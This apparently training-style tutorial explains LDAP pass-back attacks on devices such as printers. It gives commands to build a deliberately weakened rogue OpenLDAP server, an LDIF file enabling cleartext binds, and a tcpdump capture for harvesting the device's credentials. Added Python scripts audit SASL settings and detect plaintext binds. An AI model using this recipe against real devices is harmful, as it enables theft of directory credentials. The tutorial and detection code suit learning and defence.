LDAP Pass-back Attacks

LDAP Pass-back attacks are a method of obtaining LDAP credentials from a device whose configuration already holds LDAP (Lightweight Directory Access Protocol) parameters. Such parameters are often found in the configuration settings of devices like network printers, typically accessible through a web interface.

In an LDAP Pass-back attack, an attacker with access to that configuration edits the LDAP settings, which include the IP address or hostname of the LDAP server. The attacker replaces this value with their own IP address and then triggers the device's "test LDAP configuration" function. This makes the device initiate an LDAP authentication attempt against the attacker's rogue server, which records the bind and thereby obtains the device's stored LDAP credentials.

Note: The default port for LDAP communication is 389.

While interacting with the web interface of such a device (for example a printer, as pictured), the responses to the configuration test can be observed.

To carry the attack through to a credential, however, a rogue LDAP server must be set up and deliberately configured in an insecure way, so that the device is willing to send its credentials in plaintext.

Hosting a Rogue LDAP Server - OpenLDAP

To set up a rogue LDAP server, follow these steps:

  1. Update the package list, install the OpenLDAP server and tools, and enable the service:

     sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

  2. When prompted whether to omit server configuration, choose "No" so that the following prompts appear.

  3. Provide the DNS domain name and use the same name for the Organization name.

  4. Set an Administrator password.

  5. Select "MDB" as the LDAP database to use.

  6. For the last two options, ensure the database is not removed when the package is purged and that old database files are moved before new ones are created.

Before the rogue LDAP server can be used, it must be made deliberately weak by restricting the SASL security properties so that cleartext mechanisms are offered. This is done with an LDIF (LDAP Data Interchange Format) file named "olcSaslSecProps.ldif" with the following content (the changetype line makes the modify operation explicit):

#olcSaslSecProps.ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

This sets the SASL (Simple Authentication and Security Layer) security properties of the server: noanonymous disables mechanisms that allow anonymous login, minssf=0 declares that no minimum security strength (no encryption or integrity protection) is required, and passcred asks clients to pass their credentials to the server.

Apply the LDIF file to the LDAP server and restart the service with the following commands:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

You can verify that the configuration has been applied to your rogue LDAP server by using the following command:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

The output should list "PLAIN" and "LOGIN" among the supported SASL mechanisms, both of which send the password in cleartext.
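The olcSaslSecProps value above is what makes the server weak. As an added example that is not part of the original page, the following Python audits such a value the way a defender reviewing a directory server's cn=config would: it parses the comma-separated property list and reports each setting that permits cleartext binds, comparing the page's weak value with a hardened one. The SSF threshold and the hardened value are assumptions chosen for this example.

```python
"""Audit OpenLDAP olcSaslSecProps values for settings that allow cleartext authentication.

Added example, not from the original page. The property names (noanonymous,
noplain, minssf, passcred) are the ones OpenLDAP accepts for sasl-secprops /
olcSaslSecProps; the threshold below is an assumption for this example.
"""

MIN_ACCEPTABLE_SSF = 56  # assumption: anything below this is treated as cleartext-equivalent

# The weak value from the page and an assumed hardened counterpart.
WEAK_SECPROPS = "noanonymous,minssf=0,passcred"
HARDENED_SECPROPS = "noanonymous,noplain,minssf=128"  # assumption: example hardened value


def parse_secprops(value: str) -> dict:
    """Turn 'noanonymous,minssf=0,passcred' into {'noanonymous': True, 'minssf': 0, 'passcred': True}."""
    props = {}
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        if "=" in item:
            key, num = item.split("=", 1)
            props[key.strip()] = int(num)  # numeric properties: minssf, maxssf, maxbufsize
        else:
            props[item] = True  # flag properties: noplain, noanonymous, passcred, ...
    return props


def audit_secprops(value: str) -> list:
    """Return a list of findings for an explicit olcSaslSecProps value.

    An empty list means nothing weak was found. Note that an absent attribute
    is not the same as an empty value: slapd then applies its own default.
    """
    props = parse_secprops(value)
    findings = []
    if props.get("minssf", 0) < MIN_ACCEPTABLE_SSF:
        findings.append(f"minssf={props.get('minssf', 0)} permits unprotected (cleartext) SASL binds")
    if not props.get("noplain"):
        findings.append("noplain absent: PLAIN/LOGIN mechanisms that send the password in the clear are offered")
    if not props.get("noanonymous"):
        findings.append("noanonymous absent: ANONYMOUS mechanism is offered")
    if props.get("passcred"):
        findings.append("passcred set: clients are asked to pass their credentials to the server")
    return findings


if __name__ == "__main__":
    for label, value in (("weak", WEAK_SECPROPS), ("hardened", HARDENED_SECPROPS)):
        print(f"{label}: {value}")
        for finding in audit_secprops(value) or ["no weak settings found"]:
            print("  -", finding)
```

The value to feed in comes from the server's own cn=config entry (for example the olcSaslSecProps attribute returned by an ldapsearch against cn=config); the script deliberately treats a minssf below the threshold, a missing noplain, and passcred as separate findings so that each can be tracked to its own remediation.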

To capture the network traffic produced by this attack, use tcpdump as follows (breachad is the name of the network interface facing the target; substitute your own interface):

sudo tcpdump -SX -i breachad tcp port 389

This command captures traffic on TCP port 389, the default LDAP port, and prints the packet contents in hex and ASCII (-X), so a plaintext bind from the device shows its credentials in the capture. From the defender's side the same property is what makes the attack visible: an LDAP simple bind on port 389 from a printer or appliance to a host that is not one of the organisation's directory servers is the signature to alert on.
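The plaintext bind that tcpdump shows is an LDAP BindRequest with the "simple" authentication choice (RFC 4511), which is straightforward to recognise programmatically. As an added example that is not part of the original page, the following Python implements that detection: a minimal BER decoder that identifies BindRequest messages in a captured TCP payload, reports the bind DN and whether the bind was simple (cleartext) or SASL, and raises an alert when a simple bind is directed at a host outside an allowlist of approved directory servers. The credential itself is never extracted. The sample messages are constructed inside the block by a small encoder, and the approved-server address is an assumption.

```python
"""Flag plaintext LDAP simple binds to unapproved hosts in captured port-389 payloads.

Added example, not from the original page. Implements a minimal BER parser for
LDAPMessage / BindRequest (RFC 4511) for detection purposes only; the password
field is located but never returned. Sample traffic below is constructed here.
"""

APPROVED_LDAP_SERVERS = {"10.0.0.5"}  # assumption: the organisation's real directory server


def _ber_len(data: bytes, pos: int):
    """Decode a BER definite length at data[pos]; return (length, position after it)."""
    first = data[pos]
    pos += 1
    if first < 0x80:  # short form
        return first, pos
    nbytes = first & 0x7F  # long form: next nbytes hold the length
    return int.from_bytes(data[pos:pos + nbytes], "big"), pos + nbytes


def _ber_tlv(data: bytes, pos: int):
    """Read one tag-length-value triple at data[pos]; return (tag, value, position after it)."""
    tag = data[pos]
    length, pos = _ber_len(data, pos + 1)
    return tag, data[pos:pos + length], pos + length


def _encode(tag: int, payload: bytes) -> bytes:
    """BER-encode one TLV (used only to build the constructed sample messages)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + payload


def build_bind_request(msg_id: int, bind_dn: str, password: bytes, simple: bool = True) -> bytes:
    """Construct an LDAPMessage carrying a BindRequest; sample data for the detector."""
    if simple:
        auth = _encode(0x80, password)                       # authentication: [0] simple OCTET STRING
    else:
        auth = _encode(0xA3, _encode(0x04, b"GSSAPI"))       # authentication: [3] SaslCredentials
    bind = _encode(0x02, b"\x03") + _encode(0x04, bind_dn.encode()) + auth   # version 3, name, auth
    protocol_op = _encode(0x60, bind)                        # [APPLICATION 0] BindRequest
    return _encode(0x30, _encode(0x02, bytes([msg_id])) + protocol_op)       # LDAPMessage SEQUENCE


def parse_bind_request(payload: bytes):
    """Return {'message_id', 'bind_dn', 'auth'} if payload is a BindRequest, else None.

    'auth' is 'simple' (password sent in the clear) or 'sasl'. The credential
    bytes are deliberately not included in the result.
    """
    tag, body, _ = _ber_tlv(payload, 0)
    if tag != 0x30:
        return None
    tag, msg_id, pos = _ber_tlv(body, 0)
    if tag != 0x02:
        return None
    op_tag, op, _ = _ber_tlv(body, pos)
    if op_tag != 0x60:  # some other LDAP operation (search, unbind, ...)
        return None
    _, _version, pos = _ber_tlv(op, 0)
    _, dn, pos = _ber_tlv(op, pos)
    auth_tag, _credential, _ = _ber_tlv(op, pos)
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "bind_dn": dn.decode(errors="replace"),
        "auth": "simple" if auth_tag == 0x80 else "sasl",
    }


def classify_flow(src_ip: str, dst_ip: str, payload: bytes) -> str:
    """Label one port-389 payload for alerting: 'ignore', 'ok', or a WARN/ALERT line."""
    info = parse_bind_request(payload)
    if info is None:
        return "ignore"
    if info["auth"] == "simple" and dst_ip not in APPROVED_LDAP_SERVERS:
        return f"ALERT: plaintext bind as {info['bind_dn']} from {src_ip} to unapproved LDAP host {dst_ip}"
    if info["auth"] == "simple":
        return f"WARN: plaintext bind as {info['bind_dn']} from {src_ip} to {dst_ip} (use LDAPS or StartTLS)"
    return "ok"


if __name__ == "__main__":
    # Constructed sample: a printer service account binding to a host that is not the real server.
    sample = build_bind_request(1, "cn=printer,dc=example,dc=com", b"not-a-real-password")
    print(classify_flow("10.0.0.20", "192.168.1.99", sample))
```

In practice the payload passed to classify_flow is the TCP data of each packet on port 389 (for example from a pcap reader); the allowlist turns the page's observation into a rule: a simple bind is always worth a warning, and a simple bind to a host that is not a known directory server is the pass-back pattern.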
